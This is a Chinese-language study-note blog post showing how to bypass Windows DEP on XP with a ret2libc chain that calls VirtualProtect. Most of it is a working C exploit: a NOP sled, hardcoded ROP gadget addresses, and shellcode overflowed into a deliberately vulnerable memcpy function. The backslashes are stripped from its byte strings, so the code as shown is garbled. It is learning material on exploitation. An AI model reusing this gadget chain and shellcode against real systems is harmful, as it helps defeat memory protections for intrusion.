• Ret2libc 利用 VitualProtect


    DEP 概念

    首先   WINDOWS 2003  是默认开启DEP的  一般都拿2003来做试验

    今天我用  XP  开启DEP 做实验  一回事

    ·······················································

    只是学习笔记·····································另外的方法:

    Ret2libc  NtSetInformationProcess  去关闭DEP

    BOOL VirtualProtect(
    LPVOID lpAddress, // 目标地址起始位置     *shellcode所在内存空间起始地址
    DWORD dwSize, // 大小                     *shellcode大小
    DWORD flNewProtect, // 请求的保护方式     *0x40 PAGE_EXECUTE_READWRITE
    PDWORD lpflOldProtect // 保存老的保护方式 *某个可写地址
    );
    成功返回非0  修改失败返回0


    先总结:

    首先  一般都是覆盖  返回地址,因为 软 DEP  也就是 SAFESEH  那么要用  可执行的模块!!!!!!!

    !searchcode jmp esp   可以显示  模块属性          DEP寻找特殊代码时要用!!!!!!!!!!!!!!!


    书上的例子  是覆盖返回地址  然后  溢出漏洞函数 从 strcpy 改为  memcpy 函数 ,因为它对 "x00"不截断


    #include "stdafx.h"
    #include <windows.h>
    
    char shellcode[] = 
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90"
    
    // PS 这种方法不能用OD插件快速找到地址,可用 !searchcode jmp esp
    //7C80997D    58              pop eax ret 
    "x7dx99x80x7c"
    
    //地址=7C92E7D9
    //消息=Found:POP ESI POP EBX POP EDI  RETN at 0x7c92e7d9     Module:  C:WINDOWSsystem32
    tdll.dll
    "xd9xe7x92x7c"//这里不能修改 ESP,EBP,EAX
    
    //地址=7D760702
    //消息=Found:PUSH ESP POP EBP RET 4 at 0x7d760702     Module:  C:WINDOWSsystem32shell32.dll
    "x02x07x76x7d"
    
    //7C92120F    C3          retn
    "x0fx12x92x7c"
    
    "x90x90x90x90"
    
    "xc6xc6xebx77"//77EBC6C6   push esp jmp esp
    
    "xffx00x00x00"  //修改内存大小
    "x40x00x00x00"  //可读写执行内存属性代码
    
    "xc6xc6xebx77"//77EBC6C6   push esp jmp eax
    
    "x90x90x90x90"
    "x90x90x90x90"
    /*
    7C801AD9    FF75 14         push dword ptr ss:[ebp+0x14]
    7C801ADC    FF75 10         push dword ptr ss:[ebp+0x10]
    7C801ADF    FF75 0C         push dword ptr ss:[ebp+0xC]
    7C801AE2    FF75 08         push dword ptr ss:[ebp+0x8]
    7C801AE5    6A FF           push -0x1
    7C801AE7    E8 75FFFFFF     call kernel32.VirtualProtectEx */
    "xd9x1ax80x7c"
    
    "x90x90x90x90"
    
    //7C8369F0    FFD4            call esp
    "xf0x69x83x7c"
    
    
    "x90x90x90x90"
    "x90x90x90x90"
    "x90x90x90x90"
    "x90x90x90x90"
    
    //shellcode:
    "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
    "x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
    "x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
    "x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
    "xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
    "x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
    "xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
    "xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
    "x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
    "x53"
    "x68x64x61x30x23"
    "x68x23x50x61x6E"
    "x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";//168
    ;
    void test()
    {
    	char str[176];
    	memcpy(str,shellcode,420);
    }
    int main(int argc, char* argv[])
    {
    	HINSTANCE hTnst = LoadLibrary("shell32.dll");
    	char temp[200];
    	test();
    	return 0;
    }
    

    这种方法不好用啊  看看能不能突破······························因为strcpy要截断字符



























  • 相关阅读:
    GCC内置函数
    父类子类的拷贝构造与赋值
    外传三 动态内存申请的结果
    外传二 函数的异常规格说明
    外传一 异常处理深度解析
    第69课 技巧,自定义内存管理
    第68课 拾遗,令人迷惑的写法
    第67课 经典问题解析五
    第66课 C++中的类型识别
    第65课 C++中的异常处理(下)
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982386.html
Copyright © 2020-2023  润新知